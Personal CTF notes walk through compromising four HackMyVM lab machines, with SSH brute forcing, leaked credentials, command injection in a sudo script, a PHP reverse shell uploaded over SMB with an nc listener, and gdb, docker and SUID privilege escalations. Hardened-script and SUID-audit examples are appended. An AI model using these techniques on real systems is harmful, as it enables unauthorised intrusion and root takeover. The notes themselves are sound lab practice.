hackmyvm machines note

gift

❯ hydra -l root -P ctf/tool/dic/rockyou.txt -s 22 192.168.0.106 ssh
...
[22][ssh] host: 192.168.0.106 login: root password: simple
...

simple

gift:~# cat user.txt root.txt

pwned

scan

~
❯ rustscan -a 192.168.0.110
...

PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
22/tcp open ssh syn-ack
53/tcp open domain syn-ack
80/tcp open http syn-ack

web

<h1>  vanakam nanba (Hello friend) </h1>

A last note from Attacker :)

I am Annlynn. I am the hacker hacked your server with your employees but they don't know how i used them.
Now they worry about this. Before finding me investigate your employees first. (LOL) then find me Boomers XD..!!

<!-- I forgot to add this on last note
You are pretty smart as i thought
so here i left it for you
She sings very well. l loved it -->

Annlynn

dir

❯ gobuster dir -u http://192.168.0.110 -w ctf/tool/dic/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
...
/nothing (Status: 301) [Size: 316] [--> http://192.168.0.110/nothing/]
/server-status (Status: 403) [Size: 278]
/hidden_text (Status: 301) [Size: 320] [--> http://192.168.0.110/hidden_text/]
...

http://192.168.0.110/hidden_text/secret.dic

/hacked
/vanakam_nanba
/hackerman.gif
/facebook
/whatsapp
/instagram
/pwned
/pwned.com
/pubg
/cod
/fortnite
/youtube
/kali.org
/hacked.vuln
/users.vuln
/passwd.vuln
/pwned.vuln
/backup.vuln
/.ssh
/root
/home

❯ gobuster dir -u http://192.168.0.110 -w tmp
/pwned.vuln (Status: 301) [Size: 319] [--> http://192.168.0.110/pwned.vuln/]
...

view-source:http://192.168.0.110/pwned.vuln/

<?php
// if (isset($_POST['submit'])) {
// $un=$_POST['username'];
// $pw=$_POST['password'];
//
// if ($un=='ftpuser' && $pw=='B0ss_B!TcH') {
// echo "welcome"
// exit();
// }
// else
// echo "Invalid creds"
// }
?>

ftpuser
B0ss_B!TcH

login ftp

❯ ftp 192.168.0.110
...
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Jul 10 2020 share
226 Directory send OK.
ftp> cd share
250 Directory successfully changed.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 2602 Jul 09 2020 id_rsa
-rw-r--r-- 1 0 0 75 Jul 09 2020 note.txt
226 Directory send OK.
ftp> get id_rsa
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for id_rsa (2602 bytes).
226 Transfer complete.
2602 bytes received in 0.0064 seconds (397.2097 kbytes/s)
ftp> get note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (75 bytes).
226 Transfer complete.
75 bytes received in 0.0064 seconds (11.4952 kbytes/s)
ftp> quit
221 Goodbye.

❯ cat note.txt

Wow you are here

ariana won't happy about this note

sorry ariana :(

ariana

ssh ariana

❯ ssh ariana@192.168.0.110 -i id_rsa
Linux pwned 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jul 10 13:03:23 2020 from 192.168.18.70
ariana@pwned:~$ ls -la
total 40
drwxrwx--- 4 ariana ariana 4096 Jul 10 2020 .
drwxr-xr-x 5 root root 4096 Jul 10 2020 ..
-rw-r--r-- 1 ariana ariana 142 Jul 10 2020 ariana-personal.diary
-rw------- 1 ariana ariana 4 Jul 10 2020 .bash_history
-rw-r--r-- 1 ariana ariana 220 Jul 4 2020 .bash_logout
-rw-r--r-- 1 ariana ariana 3526 Jul 4 2020 .bashrc
drwxr-xr-x 3 ariana ariana 4096 Jul 6 2020 .local
-rw-r--r-- 1 ariana ariana 807 Jul 4 2020 .profile
drwx------ 2 ariana ariana 4096 Jul 9 2020 .ssh
-rw-r--r-- 1 ariana ariana 143 Jul 10 2020 user1.txt
ariana@pwned:~$ cat user1.txt
congratulations you Pwned ariana

Here is your user flag ↓↓↓↓↓↓↓

fb8d98be1265dd88bac522e1b2182140

Try harder.need become root

ariana@pwned:~$ cat ariana-personal.diary
Its Ariana personal Diary :::

Today Selena fight with me for Ajay. so i opened her hidden_text on server. now she resposible for the issue.

$ sudo -l
Matching Defaults entries for ariana on pwned:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ariana may run the following commands on pwned:
(selena) NOPASSWD: /home/messenger.sh

$ cat /home/messenger.sh
#!/bin/bash

clear
echo "Welcome to linux.messenger "
echo ""
users=$(cat /etc/passwd | grep home | cut -d/ -f 3)
echo ""
echo "$users"
echo ""
read -p "Enter username to send message : " name
echo ""
read -p "Enter message for $name :" msg
echo ""
echo "Sending message to $name "

$msg 2> /dev/null

echo ""
echo "Message sent to $name :) "
echo ""

$ sudo -u selena /home/messenger.sh
'alacritty': unknown terminal type.
Welcome to linux.messenger


ariana:
selena:
ftpuser:

Enter username to send message : selena

Enter message for selena :/bin/bash


id
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)

python3 -c "import pty; pty.spawn('/bin/bash');"
selena@pwned:/home/ariana$

selena@pwned:~$ cat user2.txt selena-personal.diary
711fdfc6caad532815a440f7f295c176

You are near to me. you found selena too.

Try harder to catch me
Its Selena personal Diary :::

Today Ariana fight with me for Ajay. so i left her ssh key on FTP. now she resposible for the leak.

selena@pwned:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# cd
# ls -la
total 28
drwx------ 3 root root 4096 Jul 10 2020 .
drwxr-xr-x 18 root root 4096 Jul 6 2020 ..
-rw------- 1 root root 292 Jul 10 2020 .bash_history
-rw-r--r-- 1 root root 601 Jul 6 2020 .bashrc
drwxr-xr-x 3 root root 4096 Jul 4 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 429 Jul 10 2020 root.txt
# cat root.txt
4d4098d64e163d2726959455d046fd7c

You found me. i dont't expect this (◎ . ◎)

I am Ajay (Annlynn) i hacked your server left and this for you.

I trapped Ariana and Selena to takeover your server :)


You Pwned the Pwned congratulations :)

share the screen shot or flags to given contact details for confirmation

Telegram https://t.me/joinchat/NGcyGxOl5slf7_Xt0kTr7g

Instgarm ajs_walker

Twitter Ajs_walker
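
The root cause of the ariana to selena step is that /home/messenger.sh runs the typed message as a command (`$msg 2> /dev/null`). A hardened take on the same script, added here as an example and not the box's own code; `list_users`, `send_message`, `messenger_main`, `SPOOL_DIR` and the spool-file delivery are assumptions:

```sh
#!/bin/sh
# Added example, not the box's script. send_message, list_users and SPOOL_DIR
# are assumed names; the spool-file delivery is an assumed design.
SPOOL_DIR="${SPOOL_DIR:-/var/spool/messenger}"

# Print accounts whose home directory is under /home (passwd-format file).
list_users() {
    awk -F: '$6 ~ /^\/home\// { print $1 }' "${1:-/etc/passwd}"
}

# send_message NAME MSG [PASSWD_FILE]
# Appends MSG to $SPOOL_DIR/NAME; returns 1 if NAME is not a listed account.
send_message() {
    sm_name=$1 sm_msg=$2 sm_passwd=${3:-/etc/passwd}
    # Whole-line fixed-string match: rejects empty names, "../x", globs.
    if [ -z "$sm_name" ] || ! list_users "$sm_passwd" | grep -Fxq -- "$sm_name"; then
        echo "unknown user" >&2
        return 1
    fi
    mkdir -p -- "$SPOOL_DIR" || return 1
    # The message is data only. The original ran it as a command line with
    # `$msg 2> /dev/null`; here it is written verbatim and never expanded.
    printf '%s\n' "$sm_msg" >> "$SPOOL_DIR/$sm_name"
}

# Same prompts as the original; read -r keeps backslashes literal.
messenger_main() {
    echo "Welcome to linux.messenger"
    list_users
    printf 'Enter username to send message : '; read -r name
    printf 'Enter message for %s :' "$name"; read -r msg
    send_message "$name" "$msg" && echo "Message sent to $name :)"
}

# Prompt only when asked to, so the functions can be sourced and tested.
if [ "${1:-}" = "--interactive" ]; then messenger_main; fi
```

With this version, entering /bin/bash as the message only stores the text "/bin/bash" in selena's spool file.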

Connection

scan

❯ rustscan -a  192.168.0.104
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
53/tcp open domain syn-ack
80/tcp open http syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack

web

❯ gobuster dir -u http://192.168.0.104 -w ~/ctf/tool/dic/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
/server-status (Status: 403) [Size: 278]
Progress: 220558 / 220558 (100.00%)
===============================================================
Finished
===============================================================

smb

file upload

reverseShell

❯ smbclient --list=192.168.0.104 --no-pass
Can't load /etc/samba/smb.conf - run testparm to debug it
Anonymous login successful

Sharename Type Comment
--------- ---- -------
share Disk
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Private Share for uploading files)
SMB1 disabled -- no workgroup available

❯ enum4linux -a -o 192.168.0.104
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Aug 8 17:47:46 2025

Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

❯ smbclient //192.168.0.104/share -N
smb: \> cd html
smb: \html\> ls
index.html N 10701 Wed Sep 23 09:48:45 2020

smb: \html\> put reverseShell.php
putting file reverseShell.php as \html\reverseShell.php (3818.0 kb/s) (average 3818.4 kb/s)
smb: \html\> ls
. D 0 Fri Aug 8 18:12:41 2025
.. D 0 Wed Sep 23 09:48:39 2020
index.html N 10701 Wed Sep 23 09:48:45 2020
reverseShell.php A 3910 Fri Aug 8 18:12:41 2025

suid gdb

❯ rlwrap nc -lvnp 8848
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python3 -c "import pty; pty.spawn('/bin/bash');"

www-data@connection:/home/connection$ cat local.txt
cat local.txt
3f491443a2a6aa82bc86a3cda8c39617

www-data@connection:/$ find / -perm -u=s -type f 2>/dev/null | xargs ls -la
find / -perm -u=s -type f 2>/dev/null | xargs ls -la
-rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
-rwsr-sr-x 1 root root 8008480 Oct 14 2019 /usr/bin/gdb
-rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount
-rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
-rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
-rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount
-rwsr-xr-- 1 root messagebus 51184 Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 Jan 31 2020 /usr/lib/openssh/ssh-keysign

www-data@connection:/$ /usr/bin/gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
# cd root
cd root
# ls -al
ls -al
total 24
drwx------ 3 root root 4096 Sep 22 2020 .
drwxr-xr-x 18 root root 4096 Sep 22 2020 ..
lrwxrwxrwx 1 root root 9 Sep 22 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4096 Sep 22 2020 .local
lrwxrwxrwx 1 root root 9 Sep 22 2020 .mysql_history -> /dev/null
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rwx------ 1 root root 33 Sep 22 2020 proof.txt
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
# cat proof.txt
cat proof.txt
a7c6ea4931ab86fb54c5400204474a39

suidy

scan

❯ rustscan -a  192.168.0.109 -- -A -sV
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
53/tcp open domain syn-ack (generic dns response: SERVFAIL)
80/tcp open http syn-ack nginx 1.14.2
| http-methods:
|_ Supported Methods: GET HEAD
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

web

❯ gobuster dir -u http://192.168.0.109/ -w ~/ctf/tool/dic/dir.txt
/index.html (Status: 200) [Size: 22]
/robots.txt (Status: 200) [Size: 362]

view-source:http://192.168.0.109/robots.txt

/hi
/....\..\.-\--.\.-\..\-.
/shehatesme

.... .. .- --. .- .. -.
from morse code
HIAGAIN
hiagain

http://192.168.0.109/shehatesme/

She hates me because I FOUND THE REAL SECRET!
I put in this directory a lot of .txt files.
ONE of .txt files contains credentials like "theuser/thepass" to access to her system!
All that you need is an small dict from Seclist!

❯ gobuster dir -u http://192.168.0.109/shehatesme/ -w ~/ctf/tool/dic/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt
/full.txt
/about.txt
/search.txt
/privacy.txt
/blog.txt
/new.txt
/page.txt
/forums.txt
/jobs.txt
/other.txt
/welcome.txt
/admin.txt
/faqs.txt
/2001.txt
/link.txt
/space.txt
/network.txt
/google.txt
/folder.txt
/java.txt
/issues.txt
/guide.txt
/es.txt
/art.txt
/smilies.txt
/airport.txt
/secret.txt
/procps.txt
/pynfo.txt
/lh2.txt
/muze.txt
/alba.txt
/cymru.txt
/wha.txt

request and get file

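import requests
import sys

# Read one path per line from stdin (the gobuster hits, e.g. "/full.txt")
for j in sys.stdin:
    j = j.strip()
    # Fetch the file under /shehatesme and print its contents
    response = requests.get(f"http://192.168.0.109/shehatesme{j}")
    # print(f"http://192.168.0.109/shehatesme{j}")
    print(response.text)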

bruteforce

❯ cat tmp | python tmp.py | sort | uniq -c
34
1 hidden1/passZZ!
25 jaime11/JKiufg6
1 jhfbvgt/iugbnvh
1 john765/FDrhguy
1 maria11/jhfgyRf
1 mmnnbbv/iughtyr
1 nhvjguy/kjhgyut
1 smileys/98GHbjh
1 theuser/thepass
1 yuijhse/hjupnkk

❯ hydra -L ./tmp -P ./tmp2 ssh://192.168.0.109
[22][ssh] host: 192.168.0.109 login: theuser password: thepass

hidden1:passZZ!
jaime11:JKiufg6
jhfbvgt:iugbnvh
john765:FDrhguy
maria11:jhfgyRf
mmnnbbv:iughtyr
nhvjguy:kjhgyut
smileys:98GHbjh
theuser:thepass
yuijhse:hjupnkk

❯ hydra -C ./tmp ssh://192.168.0.109
[22][ssh] host: 192.168.0.109 login: theuser password: thepass

ssh

theuser/thepass
❯ ssh theuser@192.168.0.109
theuser@suidy:~$ ls -al
total 36
drwxr-xr-x 3 theuser theuser 4096 sep 27 2020 .
drwxr-xr-x 4 root root 4096 sep 26 2020 ..
-rw------- 1 theuser theuser 29 sep 27 2020 .bash_history
-rw-r--r-- 1 theuser theuser 220 sep 26 2020 .bash_logout
-rw-r--r-- 1 theuser theuser 3526 sep 26 2020 .bashrc
drwxr-xr-x 3 theuser theuser 4096 sep 26 2020 .local
-rw-r--r-- 1 theuser theuser 807 sep 26 2020 .profile
-rw-r--r-- 1 theuser theuser 11 sep 26 2020 user.txt
-rw------- 1 theuser theuser 51 sep 26 2020 .Xauthority
theuser@suidy:~$ cat user.txt
HMV2353IVI

theuser@suidy:~$ find / -perm -u=s -type f 2>/dev/null | xargs ls -la
-rwsrwsr-x 1 root theuser 16704 sep 26 2020 /home/suidy/suidyyyyy
-rwsr-xr-x 1 root root 54096 jul 27 2018 /usr/bin/chfn
-rwsr-xr-x 1 root root 44528 jul 27 2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 84016 jul 27 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 51280 ene 10 2019 /usr/bin/mount
-rwsr-xr-x 1 root root 44440 jul 27 2018 /usr/bin/newgrp
-rwsr-xr-x 1 root root 63736 jul 27 2018 /usr/bin/passwd
-rwsr-xr-x 1 root root 63568 ene 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 34888 ene 10 2019 /usr/bin/umount
-rwsr-xr-- 1 root messagebus 51184 jun 9 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10232 mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 ene 31 2020 /usr/lib/openssh/ssh-keysign

theuser@suidy:/home/suidy$ ./suidyyyyy
suidy@suidy:/home/suidy$ id
uid=1001(suidy) gid=1000(theuser) grupos=1000(theuser),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
suidy@suidy:/home/suidy$ cat note.txt
I love SUID files!
The best file is suidyyyyy because users can use it to feel as I feel.
root know it and run an script to be sure that my file has SUID.
If you are "theuser" I hate you!

-suidy

upload

❯ python -m http.server

suidy@suidy:/home/suidy$ wget http://192.168.0.105:8000/pspy64

2025/08/08 14:49:41 CMD: UID=0 PID=1 | /sbin/init
2025/08/08 14:50:01 CMD: UID=0 PID=1446 | /usr/sbin/CRON -f
2025/08/08 14:50:01 CMD: UID=0 PID=1447 | /usr/sbin/CRON -f
2025/08/08 14:50:01 CMD: UID=0 PID=1448 | /bin/sh -c sh /root/timer.sh
2025/08/08 14:50:01 CMD: UID=0 PID=1449 | sh /root/timer.sh

upload and gcc and replace suidyyyyy

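#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

/* Replacement for /home/suidy/suidyyyyy: the file is group-writable by
   theuser, and root's script keeps the SUID bit set on it. */
int main(void)
{
    setuid(0);
    setgid(0);
    system("/bin/bash");
}

theuser@suidy:~$ gcc rootshell.c -o suidyyyyy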
theuser@suidy:~$ cp suidyyyyy /home/suidy/suidyyyyy

theuser@suidy:/home/suidy$ ./suidyyyyy
root@suidy:/home/suidy# id

root@suidy:/root# cat root.txt
HMV0000EVE
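
Both SUID listings in these notes contain the finding that led to root: setuid gdb on connection, and on suidy a setuid-root file that group theuser can overwrite while root's script keeps the bit set. The audit below is an added example, not part of the original notes; it flags both patterns from `ls -la` output, and `audit_suid`, `sample_listing` and the `RISKY_NAMES` list are assumptions:

```sh
#!/bin/sh
# Added example, not from the original notes. RISKY_NAMES is an illustrative,
# assumed list; audit_suid and sample_listing are assumed names.
RISKY_NAMES="gdb python3 perl vim find bash"

# audit_suid: read `ls -la` lines on stdin, print one finding per risky file.
#   WRITABLE     setuid file that group or others may overwrite
#   INTERPRETER  setuid on a program that can run arbitrary code by design
audit_suid() {
    awk -v risky="$RISKY_NAMES" '
    BEGIN { n = split(risky, a, " "); for (i = 1; i <= n; i++) bad[a[i]] = 1 }
    # Regular files with s/S in the owner-execute slot of the mode string.
    $1 ~ /^-..[sS]/ {
        mode = $1; owner = $3; group = $4; path = $NF
        base = path; sub(/.*\//, "", base)
        # Character 6 is group-write, character 9 is other-write.
        if (substr(mode, 6, 1) == "w" || substr(mode, 9, 1) == "w")
            printf "WRITABLE %s owner=%s group=%s\n", path, owner, group
        if (base in bad)
            printf "INTERPRETER %s owner=%s\n", path, owner
    }'
}

# Constructed sample: four lines copied from the two listings in these notes.
sample_listing() {
    cat <<'EOF'
-rwsr-sr-x 1 root root 8008480 Oct 14 2019 /usr/bin/gdb
-rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
-rwsrwsr-x 1 root theuser 16704 sep 26 2020 /home/suidy/suidyyyyy
-rwsr-xr-- 1 root messagebus 51184 jun 9 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
EOF
}

sample_listing | audit_suid
```

On a live host, pipe the notes' own `find / -perm -u=s -type f 2>/dev/null | xargs ls -la` into `audit_suid` instead of the sample.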